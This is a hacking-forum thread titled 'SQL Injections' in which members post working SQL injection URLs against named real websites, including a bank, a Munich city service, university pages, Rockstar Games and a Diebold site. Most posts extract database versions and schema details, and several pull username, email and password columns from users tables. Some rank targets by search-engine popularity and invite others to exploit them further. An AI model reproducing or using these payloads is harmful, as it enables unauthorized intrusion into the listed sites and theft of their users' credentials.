SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DeepBlue7

    DeepBlue7 Elder

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    PR 3

    Code:
    http://www.latmet.lv/view.php?num=1+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x2f,user(),version(),database())--
    latmet@localhost/5.1.36-community-log/ngs
     
  2. totenkopf

    totenkopf Elder

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    http://www.grotec.co.uk/grotec_hydroponics_help_and_advice.php?helpID=-27+UNION+SELECT+1,2+--+
    grotecdb@localhost:5.0.51a-3ubuntu5.8:grotecdb:debian-linux-gnu
     
  3. Linkus

    Linkus Member

    Joined:
    20 Dec 2008
    Messages:
    168
    Likes Received:
    15
    Reputations:
    -1
    Code:
    http://www.flop.ru/product.php?id=-73%27+UNION+SELECT+1,group_concat%28column_name%29,3,concat_ws%280x3a3a,database%28%29,user%28%29,version%28%29,@@version_compile_os%29,5,6,7,8+FROM+INFORMATION_SCHEMA.COLUMNS+where+table_name=char%2897,117,116,104,114,101,103%29+--+
    Code:
    http://www.acousticstorm.com/interview.php?id=-73%27+UNION+SELECT+1,2,3,4,5,6,group_concat%28concat_ws%280x3a3a,username,password,isAdmin%29%29+from+users+--+
    А

    Code:
    http://www.meachamrifles.com/page.php?id=-73%27+UNION+SELECT+1,2,3,4,group_concat%28column_name%29,6,7+from+information_schema.columns+where+table_name=%27users%27+--+
    http://www.meachamrifles.com/info.php
    TIC: 10
    PR: 2

    /discussion in PM =\

    P.S. if anyone manages to take it further, post back :) I'm curious

    //
    meachamrifles - a repost

    http://www.hackforums.net/showthread.php?tid=100011
     
    #13383 Linkus, 25 Nov 2010
    Last edited by a moderator: 26 Nov 2010
  4. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    BANK
    http://www.bakhtarbank.com/subpage.php?id=-15+/*!UnIoN+SeLeCt*/+group_cOnCaT(tAblE_naMe)+from+information_schema.%60tables%60+WHERE+TabLE_SCHEma=0x626b626b6162756c5f626b626462--
     
    2 people like this.
  5. BaleHoK

    BaleHoK Elder

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10
    www.muenchen.de/service/branchenbuch/?s:bid=1262&s:eek:id=21179+or(1,2)=(select+count(*),concat((select+'asa'+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+

    It's a 5


    Germans :)... a top one :)
     
    #13385 BaleHoK, 26 Nov 2010
    Last edited: 26 Nov 2010
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.research.ucdavis.edu/iuc/print.cfm?id=iuc,20,1764,1768+and+1=@@version

    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
    Dec 16 2008 19:46:53
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    _________________________
    2 people like this.
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Rockstargames!

    http://www.rockstargames.com/classics/?id=2+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9
    Yandex TIC (CY) 650
    Google PageRank (PR) 6
    Alexa Rank 7,293 +2,380
     
    7 people like this.
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.artamonovguber.ru/nakaz.php?mo=5+and+1=(select+first+1+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0)--
     
    _________________________
    1 person likes this.
  9. BlackSite

    BlackSite Banned

    Joined:
    6 Feb 2009
    Messages:
    148
    Likes Received:
    100
    Reputations:
    0
    http://website.ptmd.nl/website.php?id=15-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--

    Host IP: 85.17.96.210
    Web Server: Apache/2
    Powered-by: PHP/5.2.14
     
  10. Uex Urgent

    Uex Urgent Malicious Smiley

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://www.unificado.com.br/novo/med/see.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+--
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.snapcharity.org/content.php?pg=2&gid=462&cont=471+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,10,11,12,13,14,15,16,17,18+from+users--
     
    _________________________
    1 person likes this.
  12. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Here you go, doesn't seem to be a repost. The output looks nice, but it's of little use, the site is kind of dumb:
    http://www.*moker*guide.com/*g/*moker*Guide/popup_ha*h_weed.php?id=-427+UNION+*ELECT+1,2,3,4,5,6,7,ver*ion(),databa*e(),u*er(),11,12,13,14,15
    Replace * with s and enjoy.
     
    _________________________
  13. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.originalstyle.com.ua/index.php?w=collections2&id=-1+union+select+1,version%28%29--
    Code:
    http://www.pro-school.com.ua/index.php?w=new&id=-577+union+select+1,2,3,4,5,version%28%29,7+--+
    Code:
    http://pro-kiev.com.ua/index.php?w=day&id=-511+union+select+1,2,3,version%28%29+--+
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.fourcty.org/news.php?id=39+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+&p=7
     
    _________________________
    1 person likes this.
  15. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.rusmg.ru/php/contents.php?id=3824+and+substring(version(),1,1)=5
    ))) TIC 375
     
    3 people like this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.holybiblesays.org/articles.php?ID=165+and+1=0+union(select+1,2,version(),4,5+from+information_schema.`tables`)
    -------
    http://www.textileinsight.com/articles.php?id=508'+and+1=0+union+select+1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12+from+users--+
    --------
    http://www.hackensackriverkeeper.org/Articles.php?ID=123+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11
    --------
    http://real-press.com/articles.php?id=81+and+1=2+union+select+1,2,3,4,5,6,7,concat(login,char(58),password)+from+users_cp
    --------
    http://www.gridironstrategies.com/articles.php?id=28+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,group_concat(email,char(58),password),48,49,50,51,52,53,54,55,56,57,58+from+gs_users--
    -------
    http://www.runninginsight.com/articles.php?id=130'++and+1=0+union+select+1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12+from+users--+
     
    _________________________
    #13396 Konqi, 30 Nov 2010
    Last edited: 30 Nov 2010
    3 people like this.
  17. nemaniak

    nemaniak Elder

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.the-numbers.com PR-4 TIC-50

    Code:
    http://www.the-numbers.com/interactive/newsStory.php?newsID=-1656+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    Code:
    5.0.45:thenumbers_main@localhost:thenumbers_main
    www.mcc.commnet.edu PR-6

    Code:
    http://www.mcc.commnet.edu/newsView.php?newsID=-547+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11+--+
    Code:
    4.1.22:macmcc@localhost:mcc
     
    4 people like this.
  18. TreV@N

    TreV@N Elder

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://opekaweb.ru/news.php?ocd=view&id=18'+or+(1,1)=(select+count(0),concat((select+concat(username,0x3a,passwd)+from+members+limit+0,1),floor(rand(0)*2))+from+(information_schema.tables)+group+by+2)+--+'
     
  19. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Code:
    http://www.diebold-russia.ru/about/index.php?pmenu=1&ac=3&id=-5+UNION+SELECT+1,2,3,4,5,6--
    diebold is a company that manufactures ATMs.
     
    1 person likes this.
  20. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://boolean.org.ua/index.php?a=-7+union+select+1,concat_ws%280x3a,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--+
    Code:
    http://interatletika.cv.ua/product.php?a=10&id_categ=-34+union+select+1,version%28%29,3--
    Code:
    http://www.r-avto.kiev.ua/view_items.php?catid=-17+union+select+1,version%28%29,3--
     
    #13400 moodoone, 2 Dec 2010
    Last edited: 2 Dec 2010
    1 person likes this.